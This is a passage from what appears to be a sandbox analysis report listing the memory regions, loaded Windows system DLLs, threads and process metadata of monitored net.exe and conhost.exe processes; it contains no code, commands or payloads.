0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 814 start_va = 0x7ff714800000 end_va = 0x7ff71481cfff monitored = 0 entry_point = 0x7ff714802790 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 815 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 840 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 841 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 842 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 843 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 844 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 845 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1249 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1250 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1251 start_va = 0x7ff874540000 end_va = 0x7ff87455afff monitored = 0 entry_point = 0x7ff874541040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1252 start_va = 0x7ff875230000 end_va = 0x7ff875245fff monitored = 0 entry_point = 0x7ff875231b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1253 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1254 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1255 start_va = 0x7ff875a10000 end_va = 0x7ff875a28fff monitored = 0 entry_point = 0x7ff875a14520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1256 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1257 start_va = 0x7ff86d070000 end_va = 0x7ff86d095fff monitored = 0 entry_point = 0x7ff86d071cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1258 start_va = 0x7ff875480000 end_va = 0x7ff8754b7fff monitored = 0 entry_point = 0x7ff875498cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1259 start_va = 0x7ff861250000 end_va = 0x7ff861263fff monitored = 0 entry_point = 0x7ff861251310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1260 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1261 start_va = 0x580000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1275 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 33 os_tid = 0x29c Thread: id = 54 os_tid = 0x970 Process: id = "13" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x41bc5000" os_pid = "0xeb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xba0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 824 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 825 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 826 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 827 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 828 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 829 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 830 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 831 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 832 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 833 start_va = 0xd0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 834 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 835 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 836 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 837 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 838 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 839 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 871 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 872 start_va = 0x4c0000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 873 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 874 start_va = 0x7ff8746c0000 end_va = 0x7ff874718fff monitored = 0 entry_point = 0x7ff8746cfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 875 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 876 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 877 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 878 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 879 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 880 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 881 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 882 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 883 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 884 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 885 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 886 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 912 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 913 start_va = 0x4c0000 end_va = 0x647fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 914 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 915 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 916 start_va = 0x690000 end_va = 0x810fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 917 start_va = 0x820000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 918 start_va = 0x1c20000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 962 start_va = 0x1c20000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 963 start_va = 0x1d20000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 964 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 965 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 966 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 967 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 968 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 969 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 970 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 971 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 972 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1012 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1013 start_va = 0x1d30000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 1035 start_va = 0x1ea0000 end_va = 0x21d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1036 start_va = 0x21e0000 end_va = 0x23f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1037 start_va = 0x2400000 end_va = 0x261bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1038 start_va = 0x1d30000 end_va = 0x1e38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 1039 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1064 start_va = 0x2620000 end_va = 0x2835fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1065 start_va = 0x2840000 end_va = 0x294bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1130 start_va = 0x1c60000 end_va = 0x1c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 1131 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1132 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1133 start_va = 0x2950000 end_va = 0x2a0bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002950000" filename = "" Region: id = 1134 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1135 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1136 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1137 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1191 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1192 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1193 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1194 start_va = 0x660000 end_va = 0x661fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1195 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1196 start_va = 0x1ca0000 end_va = 0x1ca4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1197 start_va = 0x1cb0000 end_va = 0x1cb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1198 start_va = 0x1cc0000 end_va = 0x1cc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cc0000" filename = "" Region: id = 1199 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1200 start_va = 0x1cd0000 end_va = 0x1cd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1201 start_va = 0x1ce0000 end_va = 0x1ce1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ce0000" filename = "" Thread: id = 32 os_tid = 0x10f4 Thread: id = 35 os_tid = 0xc2c Thread: id = 39 os_tid = 0x108c Thread: id = 46 os_tid = 0x11a8 Process: id = "14" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x49285000" os_pid = "0x10d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x10f8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 846 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 847 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 848 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 849 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 850 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 851 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 852 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 853 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 854 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 856 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 857 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 858 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 859 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 860 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 861 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 862 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 863 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 864 start_va = 0x6d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 865 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 866 start_va = 0x7ff8746c0000 end_va = 0x7ff874718fff monitored = 0 entry_point = 0x7ff8746cfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 899 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 900 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 901 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 902 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 903 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 904 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 905 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 906 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 907 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 908 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 909 start_va = 